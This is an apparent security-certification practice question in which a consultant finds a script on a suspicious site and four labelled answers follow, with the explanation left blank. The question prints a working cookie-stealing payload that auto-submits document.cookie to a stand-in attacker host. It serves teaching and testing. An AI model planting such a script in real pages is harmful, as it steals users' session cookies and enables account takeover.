What has Gerald stumbled upon?

Gerald is a web security consultant for Protectors International. Gerald’s main responsibility is to
search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was
tipped off about a particular site and is now looking over its source code in a protected
environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled
upon?
<script>
document.write('<form name=hack method=post action="http://scarysite.com/getit.php">' +
  '<input type=hidden name=sid value="' + escape(document.cookie) + '">');
document.hack.submit();
</script>

A. Hidden post command

B. Hidden form fields

C. JavaScript hijacking

D. XSS attack

Explanation:


